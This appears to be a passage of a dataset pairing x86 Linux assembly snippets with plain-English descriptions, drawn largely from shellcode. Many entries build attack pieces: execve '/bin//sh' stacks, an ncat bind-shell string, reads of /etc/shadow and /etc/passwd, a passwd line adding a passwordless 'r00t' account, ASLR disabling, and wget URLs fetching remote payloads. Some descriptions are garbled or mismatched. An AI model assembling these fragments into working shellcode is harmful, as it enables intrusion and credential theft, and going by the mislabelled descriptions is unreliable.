+ call shellcode \n db '/proc/sys/kernel/randomize_va_space' go to _shellcode label after entering the address of the string = Ô/proc/sys/kernel/randomize_va_space' on the top of the stack
330
  call shellcode \n db '/proc/sys/kernel/randomize_va_spacex' go to _shellcode label after entering the byte string '/proc/sys/kernel/randomize_va_spacex' address on stack
331
+ call shellcode \n db 'my.txtx' go to _shellcode label after entering the byte string Ômt.txtxÕ address on the top of the stack
332
  "call shellcode \n message db ""/bin/sh""" push the address of /bin/sh on the top of the stack, and then change the eip to the address in shellcode_label
333
  call shellcode \n port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 go to shellcode label after entering port: db db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 address on stack
334
  call shellcode db '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' jump to shellcode_label after entering the byte string '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' on the top of the stack
 
723
  db 'egg mark' define the byte string 'egg mark'
724
  db 'my.txtx' define the byte string 'my.txtx'
725
  db 'rm -f /tmp/f' define the byte string 'rm -f /tmp/f'
726
+ db 0ah define the byte string Ô0ahÕ
727
+ db 0b1h define the byte string Ô0b1hÕ
728
+ db 0b8h define the byte string Ô0b8hÕ
729
+ db 0c6h define the byte string Ô0c6hÕ
730
+ db 0d8h define the byte string Ô0d8hÕ
731
+ db 0e2h define the byte string Ô0e2hÕ
732
  db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b define an array of bytes and initialize it to 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b
733
  db 0x68 declare a byte contining 0x68
734
  db 0x68 declare a byte with no label containing the value 0x68
 
739
  db 0xcd define the byte 0xcd
740
  db 10 declare a byte with no label containing the value 10
741
  db 10 declare an unlabeled byte initialized to 10
742
+ db 20h define the byte string Ô20hÕ
743
+ db 24h define the byte string Ô24hÕ
744
+ db 60h define the byte string Ô60hÕ
745
+ db 69h define the byte string Ô69hÕ
746
+ db 70h define the byte string Ô70hÕ
747
+ db 80h define the byte string Ô80hÕ
748
+ db 81h define the byte string Ô81hÕ
749
+ db 83h define the byte string Ô83hÕ
750
+ db 87h define the byte string Ô87hÕ
751
+ db 8bh define the byte string Ô8bhÕ
752
+ db 9ah define the byte string Ô9ahÕ
753
  dd 0xdeadbeef define a byte and initialize it to 0xdeadbeef
754
  dd 0xdeadbeef \n dd 0xdeadbeef define double word 0xdeadbeef two times
755
  dec al \n jz shellcode decrement the al register and jump to shellcode if the result is zero
 
1021
  function_5: \n call [esp] define function_5 and execute it
1022
  fupdisasm: define fupdisasm function
1023
  fupdisasm: define fupdisasm label
1024
+ fwait put cpu into a wait state until the coprocessor signals it has finished itÕs operation
1025
  get_key: define _get_key label
1026
  get_shellcode_addr: get_shellcode_addr function
1027
  get: declare get_label
 
1758
  lea esi, [ebp+20] load the effective address of the result of the operation [ebp+20] into the esi register
1759
  lea esi, [edi + 8] transfer the eighth character pointed by edi to esi
1760
  lea esi, [edi +16] make esi register point to shellcode
1761
+ lea esi, [edi +8] make esi point to shellcode that contains previous xorÕed results
1762
  lea esi, [esi +4] load the effective address of the result of the operation [esi +4] into the esi register
1763
  lea esi, [esi+2] load the effective address of esi+2 into esi
1764
  lea esi, [esi+4] load the effective address [esi+4] into esi
 
1924
  mov [esp+4], esp move esp into the address [esp+4]
1925
  mov [esp+4],esp sets esp as recv buffer
1926
  mov [esp+57], al move al into the address [esp+57]
1927
+ mov [esp+57],al \n mov [esp+58],ah \n mov [esp+59], ebx save into esp register the syscall command Ôint 0x80 and jump back to _stageÕ
1928
  mov [esp+58], ah move ah into the address [esp+58]
1929
  mov [esp+59], ebx move ebx into the address [esp+59]
1930
  mov [var], ebx move the contents of ebx into the 4 bytes at memory address var
 
2283
  mov bl, 0xff store 0xff into bl register
2284
  mov bl, 0xff move 0xff into bl
2285
  mov bl, 0xff move the value 0xff into bl
2286
+ mov bl, 0xff \n mov bh, 0xe2 load Ôjmp edxÕ command into ebx register
2287
  mov bl, 1 load socket = 1 into bl register
2288
  mov bl, 1 move 1 into bl
2289
  mov bl, 10 store 10 into bl register
 
2499
  mov cx, 0666 move 0666 into cx
2500
  mov cx, 0700 move 0700 into cx
2501
  mov cx, 0x191 move 0x191 into cx
2502
+ mov cx, 0x1ff store hexadecimal value of Ô777Õ in cx
2503
  mov cx, 0x1ff load hexadecimal value 0x1ff into cx register
2504
  mov cx, 0x1ff move 0x1ff into cx
2505
  mov cx, 0x2bc move 0x2bc into cx
 
2620
  mov dx, 132 move 132 into dx
2621
  mov dx, 16666 move 16666 into dx
2622
  mov dx,0x2a1 put 673 in dx
2623
+ mov dx,0x3a30 load Ô:0Õ into dx register
2624
  mov dx,0xb01 move the hexadecimal value 0xb01 to dx register
2625
+ mov eax, _start set a valid .text address, Ô_startÕ into eax
2626
  mov eax, _start move _start into eax
2627
  mov eax, [ebp+8] move value of memory address [ebp+8] into eax
2628
  mov eax, [ebx] move the 4 bytes in memory at the address contained in ebx into eax
 
2654
  mov eax, 0x50905090 store egg (0x50905090) in eax
2655
  mov eax, 0x50905090 move 0x50905090 into eax
2656
  mov eax, 0x563ed8b7 move 0x563ed8b7 into eax
2657
+ mov eax, 0x563ed8b7 \n add eax, 0x12345678 \n push eax push Ô//shÕ on stack
2658
  mov eax, 0x66 move 0x66 into eax
2659
  mov eax, 0x6c6c756e move 0x6c6c756e into eax
2660
  mov eax, 0x782f2f move 0x782f2f into eax
 
2665
  mov eax, 0x9a8dd091 move 0x9a8dd091 into eax
2666
  mov eax, 0xb33fb33f move 0xb33fb33f into eax
2667
  mov eax, 0xdeadc0de move 0xdeadc0de into eax
2668
+ mov eax, 0xdeadc0de \n sub eax, 0x70445eaf \n push eax push Ô/binÕ on stack
2669
  mov eax, 0xfeffff80 copy hexadecimal value 0xfeffff80 into eax register
2670
  mov eax, 0xfeffff80 move 0xfeffff80 into eax
2671
  mov eax, 0xffffffff move 0xffffffff into eax
 
2893
  mov ebx, 9 move number 9 into ebx
2894
  mov ebx, buff move buff to ebx
2895
  mov ebx, command move command into ebx
2896
+ mov ebx, dword 0x5090508f save egg signature altered: 0x50905090 Ð 1 into ebx
2897
  mov ebx, dword 0x5090508f move dword 0x5090508f into ebx
2898
  mov ebx, dword 0x50905091 move dword 0x50905091 into ebx
2899
  mov ebx, dword 0x50905091 \n dec ebx load hexadecimal value 0x50905091 as a double word into ebx register then decrement its content by 1
 
2922
  mov ebx, esi save the esi contenmts in ebx register
2923
  mov ebx, esi store address of /usr/bin/ncat into ebx register
2924
  mov ebx, esi copy esi content into ebx register
2925
+ mov ebx, esi load arg1 = Ô/bin/shÕ into ebx register
2926
  mov ebx, esi save esi content into ebx
2927
  mov ebx, esi move esi into ebx
2928
  mov ebx, esp push /bin/sh into ebx
 
2947
  mov ebx, esp ebx point to pushed string
2948
  mov ebx, esp move stack ptr to ebx
2949
  mov ebx, esp "moving the pointer to ""/bin//sh"" to ebx"
2950
+ mov ebx, esp moving the pointer to the string Ô/bin//cnÕ to ebx
2951
  mov ebx, esp moves the memory address of esp(pointing to our string & nulls) from the stack into ebx
2952
  mov ebx, esp save esp content into ebx
2953
  mov ebx, esp save esp content into ebx register
 
3004
  mov ecx, 0x04030382 mov ip address in ecx
3005
  mov ecx, 0x1 move 0x1 into ecx
3006
  mov ecx, 0x88998899 move 0x88998899 into ecx
3007
+ mov ecx, 0x88998899 \n sub ecx, 0x1525152a \n push ecx push ÔostsÕ on stack
3008
  mov ecx, 1 move 1 into ecx
3009
  mov ecx, 36 get 36 in the ecx
3010
  mov ecx, 4294948047 move 4294948047 into ecx
 
3154
  mov edi, 0x978cd092 move 0x978cd092 into edi
3155
  mov edi, 0x978cd092 \n mov ebx, edi load hexadecimal value 0x978cd092 into edi and ebx registers
3156
  mov edi, 0x978cd0d0 move 0x978cd0d0 into edi
3157
+ mov edi, 0x978cd0d0 \n mov esi, 0x91969dd0 \n not edi \n not esi \n push edi \n push esi push Ô/bin//sh on stackÕ
3158
  mov edi, 0xaaaa9090 move 0xaaaa9090 to edi
3159
  mov edi, 0xada67373 trtasfer the hexadecimal value 0xada67373 into edi register
3160
  mov edi, 0xada67373 move 0xada67373 into edi
 
3177
  mov edi, esp load esp content in edi register
3178
  mov edi, esp save addr of stack into edi
3179
  mov edi, esp edi points to the top of the stack
3180
+ mov edi, esp moving the pointer to the string Ô-le//bin//shÕ to edi
3181
  mov edi, esp move esp into edi
3182
  mov edi, hexstr place hexstr into edi
3183
  mov edi,0x3734b117 move hexadecimal value 0x3734b117 into edi content
 
3212
  mov edx, buff move buff to edx
3213
  mov edx, bufflen move bufflen into edx
3214
  mov edx, donelen move donelen into edx
3215
+ mov edx, dword 0x65676760 save ÔeggÕ into edx register
3216
  mov edx, dword 0x65676760 move dword 0x65676760 into edx
3217
  mov edx, dword 0x65676760 move the doubleword 0x65676760 into edx
3218
  mov edx, eatlen move eatlen into edx
 
3253
  mov edx, src move the contents of src variable into edx
3254
  mov edx, tmp move the contents of tmp variable into edx
3255
  mov edx, type var1 move the number of bytes of var1 into edx
3256
+ mov edx,0x4f904790 copy the hexadecimal value of Ò.g. into ed register
3257
  mov edx,eax copy eax content into edx register
3258
  mov edx,esp load the stack pointer into edx register
3259
  mov edx,esp load esp cpntent into edx register
 
3295
  mov esi, ecx copy ecx into esi register
3296
  mov esi, ecx move ecx into esi
3297
  mov esi, edx move remainder into esi
3298
+ mov esi, esp load in esi the pointer to Ô-fÕ argument
3299
  mov esi, esp load esp contents on esi register
3300
  mov esi, esp load the the stack pointer in esi register
3301
  mov esi, esp load esp content in esi regsister
3302
  mov esi, esp save addr of stack into esi
3303
  mov esi, esp save the name of the file into esi register
3304
+ mov esi, esp moving the pointer to Ô-vp13337Õto esi
3305
  mov esi, esp save esp content into esi register
3306
  mov esi, esp move esp into esi
3307
  mov esi, v move v to esi
 
3503
  pop ebx pop stack(2 = sys_bind = bind()) into ebx
3504
  pop ebx load string into rbx register
3505
  pop ebx set sys_bind = 2
3506
+ pop ebx save the string Ô /bin/shÕ into ebx
3507
+ pop ebx save the byte string Ômt.txtxÕ into ebx register
3508
  pop ebx save th byte string '/proc/sys/kernel/randomize_va_spacex' into ebx register
3509
  pop ebx restore ebx from the value we pushed onto the stack at the start
3510
  pop ebx restore the original value of ebx
 
3619
  push '/bin' push '/bin' onto the stack
3620
  push '/etc' push '/etc' onto the stack
3621
  push 'sswd' push 'sswd' onto the stack
3622
+ "push ""sswd"" \n push ""//pa"" \n push ""/etc""" push Ô/etc//passwdÕ on stack
3623
  push [tmp] push the 4 bytes at address tmp onto stack
3624
  push [var] push the 4 bytes at address var onto the stack
3625
  push [var2] push the 4 bytes at address var2 onto the stack
 
3627
  push 0x0 push the value 0x0 to the stack
3628
  push 0x0 push 0x0 onto the stack
3629
  push 0x0 \n push ecx \n push ebx push the value 0x0, ecx and ebx contents on stack
3630
+ push 0x0 \n push ecx \n push ebx \n mov ecx,esp load Ô/bin/cat/etc//paswd\0Õ into ex register
3631
  push 0x0068732f \n push 0x6e69622f \n mov ebx, esp save /bin/sh in the first free 32bit register
3632
  push 0x0101017f \n push word 0x5c11 \n push word 0x02 \n mov ecx, esp save the address 127.1.1.1, the value on 32bit 4444 and af_inet represented in 32bit on ecx register
3633
  push 0x04020a0a push ip adress 0x04020a0a
 
3635
  push 0x0a206873 push 0x0a206873 onto the stack
3636
  push 0x0a206873 \n push 0x2f6e6962 \n push 0x2f3a706d \n push 0x742f3a31 \n push 0x3131313a \n push 0x31313131 \n push 0x3a30754a \n push 0x4c5a304b \n push 0x45683933 \n push 0x78534a52 \n push 0x50446862 \n push 0x73644d24 \n push 0x67513231 \n push 0x3458652e \n push 0x2431243a \n push 0x64687373 \n mov ebp, esp load the string sshd:$1$.ex412qg$mdsbhdprjsx39hek0zlju0:1111:1111:/tmp:/bin/sh on ebp register
3637
  push 0x0a3a7964 push 0x0a3a7964 onto the stack
3638
+ push 0x0a3a7964 \n push 0x72706475 \n mov edx, esp load Ôudprdy:Õ into edx register
3639
  push 0x0a4c4c41 push the value 0x0a4c4c41 onto the stack
3640
  push 0x0a4c4c41 push 0x0a4c4c41 onto the stack
3641
  push 0x0b \n pop eax insert the hexadecimal value 11 on the stack and save it in the first free 32bit register
 
3734
  push 0x30 \n pop eax push 48 on the stack and put this value in eax, taking it from the stack
3735
  push 0x30313a31 push 0x30313a31 to the stack
3736
  push 0x30313a31 push 0x30313a31 onto the stack
3737
+ push 0x30313a31 \n push 0x2e312e31 \n push 0x2e373231 \n mov esi, esp \n push eax \n push 0x79616c70 \n push 0x7369642d \n mov edi,esp \n push eax \n push 0x6d726574 \n push 0x782f6e69 \n push 0x622f7273 \n push 0x752f2f2f \n mov ebx,esp \n push eax \n push esi \n push edi \n push ebx push on stack the listening ip 127.1.1.1:10 and save it into esi register then push null and Ô- displayÕ command and save it in edi register. subsequently push null and the string Ô///usr/bin/xtermÕ and save it into ebx register. in the end push eax, esi, edi and ebx on sta stack.
3738
  push 0x30317974 push 0x30317974 onto the stack
3739
  push 0x30317974 push the 0x30317974 onto the stack
3740
  push 0x31313131 push 0x31313131 onto the stack
 
3747
  push 0x32322e32 push 0x32322e32 onto the stack
3748
  push 0x32322e32 push 0x32322e32 to the stack
3749
  push 0x3458652e push 0x3458652e onto the stack
3750
+ push 0x37333333 \n push 0x3170762d push Ô-vp13337Õ on stack
3751
  push 0x37373333 push 0x37373333 to the stack
3752
  push 0x37373333 push the 0x37373333 onto the stack
3753
  push 0x37373333 push 0x37373333 onto the stack
3754
  push 0x3a303a3a push 0x3a303a3a onto the stack
3755
+ push 0x3a303a3a \n push 0x74303072 push Ôr00t::0 on stack
3756
  push 0x3a30754a push 0x3a30754a onto the stack
3757
  push 0x3a3a3a30 \n push esi push :::0 and esi content on stack
3758
  push 0x3d4c4c41 push the value 0x3d4c4c41 onto the stack
 
3783
  push 0x50446862 push 0x50446862 onto the stack
3784
  push 0x53534150 push the 0x53534150 onto the stack
3785
  push 0x53534150 push 0x53534150 onto the stack
3786
+ push 0x5f657a69 push Ô_eziÕ on stack
3787
  push 0x6 push ipproto_tcp value, 6, on stack
3788
  push 0x6 push protocol ipv6 value, 6, on stack
3789
  push 0x6 push 0x6 onto the stack
 
3796
  push 0x6168732f push 0x6168732f onto the stack
3797
  push 0x6168732f push 0x6168732f to the stack
3798
  push 0x6168732f push the value 0x6168732f onto the stack
3799
+ push 0x6168732f \n push 0x6374652f push Ô/etc/shaÕ on stack
3800
  push 0x6168732f \n push 0x6374652f \n mov ebx, esp push the value 0x6168732f and the value 0x6374652f onto the stack and point the ebx register to the stack register
3801
  push 0x61702f2f push 0x61702f2f onto the stack
3802
+ push 0x61702f2f \n push 0x13371337 \n push 0x64777373 \n push 0x6374652f push Ô/etcsswd7.7.//paÕ on stack
3803
  push 0x61702f2f \n push 0x6374652f \n mov eax, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the eax register to the stack register
3804
  push 0x61702f2f \n push 0x6374652f \n mov ebx, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the ebx register to the stack register
3805
  push 0x61702f2f \n push 0x6374652f \n mov ecx, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the ecx register to the stack register
 
3808
  push 0x61702f2f \n push 0x6374652f \n mov esi, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the esi register to the stack register
3809
  push 0x61702f63 push the 0x61702f63 onto the stack
3810
  push 0x61702f63 push 0x61702f63 onto the stack
3811
+ push 0x61722f6c push Ôar/ on satck
3812
  push 0x622f7273 push 0x622f7273 onto the stack
3813
  push 0x622f7273 push 0x622f7273 to the stack
3814
  push 0x636e2f2f push 0x636e2f2f onto the stack
3815
  push 0x636e2f2f push 0x636e2f2f to the stack
3816
  push 0x636e2f2f push the 0x636e2f2f onto the stack
3817
+ push 0x636e2f2f \n push 0x6e69622f push Ô /bin//cnÕ on stack
3818
+ push 0x636e2f2f \n push 0x6e69622f push the string Ô/bin//cnÕ on stack
3819
  push 0x6374652f push 0x6374652f onto the stack
3820
  push 0x6374652f push 0x6374652f to the stack
3821
  push 0x6374652f push the 0x6374652f onto the stack
 
3847
  push 0x64777373 push 0x64777373 onto the stack
3848
  push 0x64777373 \n push 0x61702f63 \n push 0x74652f2f \n mov ebx, esp push the path //etc/passwd on the stack and load stack pointer to ebx
3849
  push 0x64777373 \n push 0x61702f63 \n push 0x74652f2f \n xor ebx, ebp \n lea ebx, [esp] push the path //etc/passwd on the stack and load stack pointer to ebx
3850
+ push 0x65636170 push ÔecapÕ on stack
3851
  push 0x6567772f push 0x6567772f onto the stack
3852
  push 0x6567772f push 0x6567772f to the stack
3853
  push 0x656c6966 push 0x656c6966 onto the stack
3854
  push 0x656c6966 push the 0x656c6966 onto the stack
3855
+ push 0x656e7265 push ÔenreÕ label on stack
3856
  push 0x65726f43 push 0x65726f43 onto the stack
3857
  push 0x65782e2f push 0x65782e2f onto the stack
3858
  push 0x65782e2f push 0x65782e2f to the stack
3859
+ push 0x65782e2f \n push 0x706d742f push the name of file to be executed = Ô/tmp/.xeÕ
3860
  push 0x66 push 0x66 onto the stack
3861
  push 0x66 push 0x66 to the stack
3862
  push 0x66 push the 0x66 onto the stack
 
3870
  push 0x682f2f2f push the 0x682f2f2f value onto the stack
3871
  push 0x68732f2f push ascii sh// onto stack
3872
  push 0x68732f2f push hs// string on stack
3873
+ push 0x68732f2f push Ô//shÕ on stack
3874
  push 0x68732f2f push //sh to the stack
3875
  push 0x68732f2f push hs//
3876
  push 0x68732f2f push the 0x68732f2f value onto the stack
3877
  push 0x68732f2f push the value 0x68732f2f onto the stack
3878
  push 0x68732f2f push 0x68732f2f to the stack
3879
  push 0x68732f2f push 0x68732f2f onto the stack
3880
+ push 0x68732f2f \n push 0x68732f2f \n push 0x2f656c2d push Ô -le///sh//shÕ on stack
3881
  push 0x68732f2f \n push 0x6e69622f push /bin//sh
3882
+ push 0x68732f2f \n push 0x6e69622f push Ô/bin//shÕ on stack
3883
+ push 0x68732f2f \n push 0x6e69622f push the string Ò/bin//shÓ on stack
3884
+ push 0x68732f2f \n push 0x6e69622f push Ò/bin//shÓ on stack
3885
+ push 0x68732f2f \n push 0x6e69622f push the string Ô /bin//shÕ on stack
3886
+ push 0x68732f2f \n push 0x6e69622f push Ô/bin//shÕ string on stack
3887
  push 0x68732f2f \n push 0x6e69622f \n mov eax, esp push /bin/sh onto the stack and point the eax register to the stack register
3888
  push 0x68732f2f \n push 0x6e69622f \n mov eax, esp move /bin/sh into eax
3889
  push 0x68732f2f \n push 0x6e69622f \n mov eax, esp put ASCII /bin/sh into eax
 
3898
  push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp move ASCII /bin/sh into ebx
3899
  push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp move /bin/sh into the ebx register
3900
  push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load the string /bin//sh on ebx register
3901
+ push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp make ebx pointing to the string Ò/bin//shÓ
3902
+ push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load the string Ò/bin//shÓ into ebx regsiter
3903
+ push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load Ô/bin//sh\0Õ into ebx register
3904
  push 0x68732f2f \n push 0x6e69622f \n mov ecx, esp move ASCII /bin/sh into ecx
3905
  push 0x68732f2f \n push 0x6e69622f \n mov ecx, esp move /bin/sh into the ecx register
3906
  push 0x68732f2f \n push 0x6e69622f \n mov ecx, esp push /bin/sh onto the stack and point the ecx register to the stack register
 
3909
  push 0x68732f2f \n push 0x6e69622f \n mov edx, esp put /bin/sh into edx
3910
  push 0x68732f2f \n push 0x6e69622f \n mov edx, esp move ASCII /bin/sh into edx
3911
  push 0x68732f2f \n push 0x6e69622f \n mov edx, esp move /bin/sh into the edx register
3912
+ push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d push the string Ô-le//bin//shÕ on stack
3913
+ push 0x68732f6e push Ôhs/
3914
  push 0x68732f6e push the 0x68732f6e onto the stack
3915
  push 0x68732f6e push 0x68732f6e to the stack
3916
  push 0x68732f6e push 0x68732f6e onto the stack
 
3920
  push 0x68735858 push the value 0x68735858 onto the stack
3921
  push 0x68736162 push 0x68736162 to the stack
3922
  push 0x68736162 push 0x68736162 onto the stack
3923
+ push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push the string Ô////bin/bashÕ on stack
3924
+ push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push Ô////bin/bashÕ into the stack
3925
+ push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push the string Ô////bin/bashÕ onto the stack
3926
  push 0x68736164 push 'hsad' on stack
3927
  push 0x68736164 push 0x68736164 to the stack
3928
  push 0x68736164 push 0x68736164 onto the stack
 
3936
  push 0x6873732f \n push 0x6374652f \n mov esi, esp push the value 0x6873732f and the value 0x6374652f onto the stack and point the esi register to the stack register
3937
  push 0x68737a2f push hsz/ on stack
3938
  push 0x68737a2f push 0x68737a2f onto the stack
3939
+ push 0x68737a2f \n push 0x6e69622f push the string Ô/bin/zshÕ on stack
3940
  push 0x68909090 \n pop eax load hexadecimal value 0x68909090 into eax
3941
  push 0x69616863 push the 0x69616863 onto the stack
3942
+ push 0x69622f2f push Ôib//Õ
3943
  push 0x69622f2f push the 0x69622f2f onto the stack
3944
  push 0x69622f2f push 0x69622f2f to the stack
3945
  push 0x69622f2f push 0x69622f2f onto the stack
 
3953
  push 0x69622f65 push the 0x69622f65 onto the stack
3954
  push 0x6962732f push 0x6962732f onto the stack
3955
  push 0x6962732f push the 0x6962732f onto the stack
3956
+ push 0x6b2f7379 push Ôk/stÕ label
3957
  push 0x6c626174 push 0x6c626174 onto the stack
3958
  push 0x6d6f632e \n push 0x656c676f \n push 0x6f672031 \n push 0x2e312e31 \n push 0x2e373231 push the address 127.1.1.1 google.com on stack
3959
+ push 0x6d6f646e push ÔmodnÕ on stack
3960
  push 0x6d722f2f push the 0x6d722f2f onto the stack
3961
  push 0x6d726574 push 0x6d726574 onto the stack
3962
  push 0x6d726574 push 0x6d726574 to the stack
3963
  push 0x6e push the 0x6e onto the stack
3964
  push 0x6e69622f push ascii nib/ onto stack
3965
  push 0x6e69622f push nib/ string on stack
3966
+ push 0x6e69622f push Ô/binÕ on stack
3967
  push 0x6e69622f push nib/ on stack
3968
  push 0x6e69622f push /bin to the stack
3969
  push 0x6e69622f push 0x6e69622f onto the stack
 
3990
  push 0x706d742f push 0x706d742f to the stack
3991
  push 0x706d742f push the 0x706d742f onto the stack
3992
  push 0x7268732f push 0x7268732f onto the stack
3993
+ push 0x72702f2f push Ôrp//Õ on stack
3994
  push 0x72706475 push 0x72706475 onto the stack
3995
  push 0x7273752f push 0x7273752f onto the stack
3996
  push 0x7273752f push 0x7273752f to the stack
3997
+ push 0x732f636f push Ôs/coÕ on stack
3998
+ push 0x735f6176 push Ôs_avÕ on stack
3999
  push 0x7361702f push 0x7361702f to the stack
4000
  push 0x7361702f push 0x7361702f onto the stack
4001
  push 0x73644d24 push 0x73644d24 onto the stack
 
4004
  push 0x7372656f push the 0x7372656f onto the stack
4005
  push 0x7372656f push 0x7372656f to the stack
4006
  push 0x7372656f push 0x7372656f onto the stack
4007
+ push 0x7372656f \n push 0x6475732f \n push 0x6374652f push Ò/etc/sudoersÓ on stack
4008
+ push 0x7372656f \n push 0x6475732f \n push 0x6374652f push Ô/etc/sudoersÕ into stack
4009
  push 0x7374736f push 0x7374736f onto the stack
4010
  push 0x7374736f push the 0x7374736f onto the stack
4011
  push 0x7374736f \n push 0x682f6374 \n push 0x652f2f2f push the string ///etc/hosts on stack
 
4035
  push 0x76766c2d push 0x76766c2d onto the stack
4036
  push 0x76766c2d push 0x76766c2d to the stack
4037
  push 0x76766c2d push the 0x76766c2d onto the stack
4038
+ push 0x776f6461 \n push 0x68732f63 \n push 0x74652f2f push the string Ô//etc/shadowÕ on stack
4039
+ push 0x776f6461 \n push 0x6873672f \n push 0x6374652f \n mov ebx, esp load the string Ô/etc/gshadowÕ into ebx regsiter
4040
  push 0x776f6490 \n pop ebx load hexadecimal value 0x776f6490 into ebx register
4041
  push 0x78 push 0x78 onto the stack
4042
  push 0x78 push 0x78 to the stack
 
4334
  push dword 0x6374652f push the dword 0x6374652f onto the stack
4335
  push dword 0x64616568 push the dword 0x64616568 onto the stack
4336
  push dword 0x64777373 push the dword 0x64777373 onto the stack
4337
+ push dword 0x6567772f \n push dword 0x6e69622f \n push dword 0x7273752f \n mov ebx, esp push edx, the byte +0x74 and the chined double words Ô/usr/bin/wgeÕ into ebx register
4338
  push dword 0x656e7265 push the dword 0x656e7265 onto the stack
4339
+ push dword 0x682f6365 \n push dword 0x78652f2f \n push dword 0x6f692e62 \n push dword 0x75687469 \n push dword 0x672e6d34 \n push dword 0x626d3362 push the string Ôb3mb4m.github.io//exec/ on stack as chained double words
4340
  push dword 0x68732f2f push hs// onto stack
4341
  push dword 0x68732f2f push the dword 0x68732f2f onto the stack
4342
  push dword 0x68732f63 push the dword 0x68732f63 onto the stack
 
4420
  push eax \n inc eax push eax on stack then increment its conent
4421
  push eax \n mov ebx, esp push the contents of the eax register onto the stack and point ebx to the stack register
4422
  push eax \n mov ecx, esp push the contents of the eax register onto the stack and point ecx to the stack register
4423
+ push eax \n mov edi, 0x343997b7 \n rol edi, 1 \n push edi \n mov esi, 0xd2c45e5e \n ror esi, 1 \n push esi push null terminating string and Ô/bin/shÕ to the stack
4424
  push eax \n mov edx, esp clear edx
4425
  push eax \n mov edx, esp push null in the edx position
4426
  push eax \n mov edx, esp clear eax register
 
4439
  push eax \n push 0x31373737 \n push 0x3170762d \n mov esi, esp load chained null and the arg -vp17771 into esi register
4440
  push eax \n push 0x35353535 \n push 0x70746c2d \n mov ecx, esp push 0, port number = 5555, command -ltp on stack. ecx point to the top pf the stack.
4441
  push eax \n push 0x39393939 \n push 0x39706c2d push 0-term, 9999, 9pl- on the stack
4442
+ push eax \n push 0x4b434148 push null terminated string ÔhackÕ on stack
4443
  push eax \n push 0x636e2f2f \n push 0x6e69622f \n mov ebx, esp load chained null and the arg /bin//nc into ebx register
4444
  push eax \n push 0x636e2f6e \n push 0x69622f2f push 0-term, cn/n, ib// on the stack
4445
  push eax \n push 0x6769666e \n push 0x6f635f64 \n push 0x6873732f \n push 0x6873732f \n push 0x6374652f push 0-term, gifn, oc_d, hss/, hss/, cte/ on the stack
4446
+ push eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load Ô/bin//sh\0Õ intp ebx register
4447
+ push eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load Ô/bin//sh\0Õ into ebx register
4448
  push eax \n push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d \n mov edi, esp load chained null and the arg -le//bin//sh into edi register
4449
  push eax \n push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d \n mov edx, esp load chained null and the arg -le//bin//sh into edx register
4450
+ push eax \n push 0x68732f2f \n push 0x6e69622f \n push ebx, esp \n mov edx, eax \n mov al, 0xb \n int 0x80 execute execve syscall putting null temrinated string Ô/bin//shÕ into ebx register, the parameter 0 into edx and the syscall code into al register.
4451
  push eax \n push 0x68732f6e \n push 0x69622f2f \n mov ebx, esp load the string //bin/sh\0 into ebx regsiter
4452
  push eax \n push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f652d push 0-term, hsab, /nib, //e- on the stack
4453
+ push eax \n push 0x6c6c6568 \n push 0x2f6d3462 \n push 0x6d33622f \n push 0x2f2f2f6d \n push 0x6f632e73 \n push 0x616d6978 \n push 0x656d2e33 \n mov ecx, esp save null terminated string Ô3.meximas.com////b3mb4m/hellÕ into ecx register
4454
+ push eax \n push 0x7361642f \n push 0x6e69622f \n mov ebx, esp load null terminate string Ô/bin/dasÕ into ebx regsiter
4455
  push eax \n push 0x7461632f \n push 0x6e69622f push 0-term, tac/, nib/ on the stack
4456
+ push eax \n push 0x74656777 \n push 0x2f6e6962 \n push 0x2f727375 \n push 0x2f2f2f2f \n mov ebx, esp load null terminated string Ô////usr/bin/wgetÕ intp ebx regsiter
4457
+ push eax \n push 0x746f6f62 \n push 0x65722f6e \n push 0x6962732f \n mov ebx, esp load null temrinated string Ô/sbin/rebootÕ into ebx register
4458
+ push eax \n push 0x746f6f62 \n push 0x65722f6e \n push 0x6962732f \n mov ebx, esp load null terminated string Ôsbin/rebootÕ into ebx register
4459
  push eax \n push byte +0x68 \n mov ebx,esp load eax content and the byte +0x68 into ebx register
4460
  push eax \n push byte 0x1 \n push byte 0x2 push the parameters (0, sock_stream =1, af_inet=2) on stack
4461
  push eax \n push byte 0x1 \n push byte 0x2 \n mov ecx, esp push the protocol 0, the type, sock_stream, and the domain af_inet on the stack and then load the stack pointer into ecx register
 
4484
  push eax \n push esi \n push ebx push eax, esi and bx contents on the stack
4485
  push eax \n push esi \n push edi \n push ebx push eax, esi, edi and ebx contents on stack
4486
  push eax \n push esp push eax and esp register on the stack
4487
+ push eax \n push word 0x6873 \n push 0x61622f2f \n push 0x6e69622f \n mov ebx,esp load the string Ò/bin//bash\0Ó into ebx register
4488
  push eax \n xor eax, eax \n mov al, 1 push eax register on the satck than clear it and put the number of the syscall exit in its laast byte
4489
  push ebp save old base pointer
4490
  push ebp save the old base pointer value
 
4503
  push ebx "push ""/bin/sh"" on stack"
4504
  push ebx push ebx(0) onto stack (ipproto_ip = 0)
4505
  push ebx push ebx(1) onto stack (sock_stream = 1)
4506
